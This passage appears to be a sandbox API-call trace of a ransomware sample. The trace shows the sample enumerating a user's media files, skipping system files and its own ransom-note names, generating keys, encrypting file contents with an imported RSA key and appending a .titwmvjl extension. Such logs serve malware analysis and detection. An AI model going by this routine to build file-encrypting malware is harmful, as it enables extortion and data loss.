dwFreeType=0x8000) returned 1 [0085.787] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0085.787] lstrcmpW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2=".") returned 1 [0085.787] lstrcmpW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="..") returned 1 [0085.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="rJahNObUwfw7QQrXIp.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi" [0085.787] lstrlenW (lpString=".titwmvjl") returned 9 [0085.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi") returned 60 [0085.787] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.787] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi.titwmvjl") returned 69 [0085.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi") returned 60 [0085.788] lstrlenW (lpString=".avi") returned 4 [0085.788] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.788] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0085.788] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0085.788] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi") returned 60 [0085.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi") returned 60 [0085.788] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="desktop.ini") returned 1 [0085.788] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="autorun.inf") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="ntuser.dat") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="iconcache.db") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="bootsect.bak") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="boot.ini") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="ntuser.dat.log") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="thumbs.db") returned -1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="CRAB-DECRYPT.html") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="ntldr") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="NTDETECT.COM") returned 1 [0085.789] lstrcmpiW (lpString1="rJahNObUwfw7QQrXIp.avi", lpString2="Bootfont.bin") returned 1 [0085.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi") returned 60 [0085.789] lstrlenW (lpString=".avi") returned 4 [0085.789] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.789] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0085.790] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.790] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.790] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\rjahnobuwfw7qqrxip.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0085.791] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.792] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0085.793] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.793] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.796] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.796] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.797] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.797] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0085.797] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.797] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.797] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.797] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.797] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.802] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.802] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.802] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.803] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0085.803] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.803] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.803] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.803] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.803] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.805] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034f8) returned 1 [0085.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.806] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.806] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.807] GetLastError () returned 0x0 [0085.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.807] CryptDestroyKey (hKey=0x5034f8) returned 1 [0085.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.807] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.808] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.810] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5037f8) returned 1 [0085.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.811] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.811] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.811] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.812] GetLastError () returned 0x0 [0085.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.812] CryptDestroyKey (hKey=0x5037f8) returned 1 [0085.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.812] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.812] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.813] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.813] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x13393, lpOverlapped=0x0) returned 1 [0085.838] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffecc6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.838] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13393, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x13393, lpOverlapped=0x0) returned 1 [0085.841] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.841] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0085.843] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.850] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.851] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.851] CloseHandle (hObject=0x2b4) returned 1 [0085.852] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\rjahnobuwfw7qqrxip.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\rJahNObUwfw7QQrXIp.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\rjahnobuwfw7qqrxip.avi.titwmvjl"), dwFlags=0x1) returned 1 [0085.853] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.853] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0085.853] lstrcmpW (lpString1="RqVYRuX.m4a", lpString2=".") returned 1 [0085.854] lstrcmpW (lpString1="RqVYRuX.m4a", lpString2="..") returned 1 [0085.854] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="RqVYRuX.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a" [0085.854] lstrlenW (lpString=".titwmvjl") returned 9 [0085.854] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a") returned 49 [0085.854] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.854] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a.titwmvjl") returned 58 [0085.854] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a") returned 49 [0085.854] lstrlenW (lpString=".m4a") returned 4 [0085.854] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.854] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0085.855] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0085.855] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.855] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a") returned 49 [0085.855] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a") returned 49 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="desktop.ini") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="autorun.inf") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="ntuser.dat") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="iconcache.db") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="bootsect.bak") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="boot.ini") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="ntuser.dat.log") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="thumbs.db") returned -1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="CRAB-DECRYPT.html") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="ntldr") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="NTDETECT.COM") returned 1 [0085.855] lstrcmpiW (lpString1="RqVYRuX.m4a", lpString2="Bootfont.bin") returned 1 [0085.855] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a") returned 49 [0085.855] lstrlenW (lpString=".m4a") returned 4 [0085.856] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.856] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0085.856] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.856] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.856] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\rqvyrux.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0085.857] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.858] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0085.859] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.859] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.863] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.863] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.863] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.863] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0085.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.864] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.864] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.864] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.866] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.866] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.867] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.867] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0085.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.867] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.867] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.867] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.869] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0085.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.869] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.870] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.870] GetLastError () returned 0x0 [0085.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.870] CryptDestroyKey (hKey=0x5036f8) returned 1 [0085.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.870] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.871] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.872] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503578) returned 1 [0085.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.873] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.873] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.873] GetLastError () returned 0x0 [0085.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.874] CryptDestroyKey (hKey=0x503578) returned 1 [0085.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.874] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.874] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.874] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.875] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x19e5, lpOverlapped=0x0) returned 1 [0085.891] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffe61b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.891] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x19e5, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x19e5, lpOverlapped=0x0) returned 1 [0085.893] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.893] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0085.894] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.899] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.899] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.899] CloseHandle (hObject=0x2b4) returned 1 [0085.900] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\rqvyrux.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RqVYRuX.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\rqvyrux.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0085.901] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.901] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0085.901] lstrcmpW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2=".") returned 1 [0085.901] lstrcmpW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="..") returned 1 [0085.901] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="RzsjBZcZllXZJRVXtlY.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav" [0085.901] lstrlenW (lpString=".titwmvjl") returned 9 [0085.901] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav") returned 61 [0085.901] VirtualAlloc (lpAddress=0x0, dwSize=0xba, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.902] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav.titwmvjl") returned 70 [0085.902] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav") returned 61 [0085.902] lstrlenW (lpString=".wav") returned 4 [0085.902] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.902] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0085.902] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0085.902] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.902] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav") returned 61 [0085.902] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav") returned 61 [0085.902] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="desktop.ini") returned 1 [0085.902] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="autorun.inf") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="ntuser.dat") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="iconcache.db") returned 1 [0085.903] lstrcmpiW 